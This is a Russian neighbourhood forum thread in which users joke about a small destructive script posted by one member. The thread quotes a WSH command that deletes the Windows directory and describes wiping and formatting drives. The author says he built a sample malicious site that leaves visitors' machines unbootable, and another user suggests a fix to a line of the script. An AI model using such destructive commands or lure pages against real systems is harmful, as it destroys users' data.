Перейти к публикации
Форум района Строгино
sneg

я не скажу кто меня задолбал

Рекомендованные сообщения

...wsh.Run('start m deltree /y c:windows')...
А у меня нету диска C:, что мне делать? :)

А ещё нету ни f: ни e: ни остальных других. Денег не хватило :)

А вообще мне понравилось. Компактный получился эксплойтик.

 

маленкьий,компактный,простенький :) просто первое,что пришло в голову :) можно что нить и по злее к нему присобачить :)

Поделиться сообщением


Ссылка на сообщение
...wsh.Run('start m deltree /y c:windows')...
А у меня нету диска C:, что мне делать? :)

А ещё нету ни f: ни e: ни остальных других. Денег не хватило :)

А вообще мне понравилось. Компактный получился эксплойтик.

 

маленкьий,компактный,простенький :) просто первое,что пришло в голову :) можно что нить и по злее к нему присобачить :)

А ведь можно его ещё меньше сделать.

Ведь сначала стираются данные с дисков, потом диски форматируются, потом (с отформатированного диска) стирается директория Windows

Можно, наверное только форматирование оставить. Эффект, вроде, будет тот же

Поделиться сообщением


Ссылка на сообщение
...wsh.Run('start m deltree /y c:windows')...
А у меня нету диска C:, что мне делать? :)

А ещё нету ни f: ни e: ни остальных других. Денег не хватило :)

А вообще мне понравилось. Компактный получился эксплойтик.

 

маленкьий,компактный,простенький :) просто первое,что пришло в голову :) можно что нить и по злее к нему присобачить :)

А ведь можно его ещё меньше сделать.

Ведь сначала стираются данные с дисков, потом диски форматируются, потом (с отформатированного диска) стирается директория Windows

Можно, наверное только форматирование оставить. Эффект, вроде, будет тот же

 

можно и так... это уж кто во что горазд :)

Поделиться сообщением


Ссылка на сообщение

Только не C:Windows, а %windir% вообще-то... да и все равно работать это уже давно не будет :)

Поделиться сообщением


Ссылка на сообщение
Только не C:Windows, а %windir% вообще-то... да и все равно работать это уже давно не будет :)

 

 

это же пример :) образец для размышлений :) если бы я хотел чделать что то зловредное - это было бы мало заметно и сильно противно.. ибо боевые скрипты теряют актуальность после первого испоользования,достигнув нужной системы и поразив её

Поделиться сообщением


Ссылка на сообщение
или замани его на сайтик с вредоносным скриптом - он туда зайдет,потом ком перезагрузит,а потом он больше не включится... я для образца собрал www.cputest.nm.ru тока сами туда не зайдите... а то будет как я написал :)

зашёл по ссылке, комп перезагрузил, никакого эфекта... жду уже третий час, что я не так сделал?

Поделиться сообщением


Ссылка на сообщение

... и ещё:

я мало чего понял в скрипте т.к. хренова знаю яву и апплеты, но помойму в строке:

setTimeout("a1.setProperty('Path','"+fn_en+"');",1000);

есть ошибка и должно быть:

setTimeout("a1.setProperty('Path',"+fn_en+");",1000);

а то получается что в свойство заносится значение fn_en, а не переменная fn_en

Поделиться сообщением


Ссылка на сообщение
или замани его на сайтик с вредоносным скриптом - он туда зайдет,потом ком перезагрузит,а потом он больше не включится... я для образца собрал www.cputest.nm.ru тока сами туда не зайдите... а то будет как я написал :)

зашёл по ссылке, комп перезагрузил, никакого эфекта... жду уже третий час, что я не так сделал?

 

хз.. че то не сработало... бывает

Поделиться сообщением


Ссылка на сообщение

народ не кто не знает что нужно ip 10.105.8.66 ну просто пристал как банный лист. сканит и сканит. да еще чего-то там пытается там сделать.че за фигня.

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×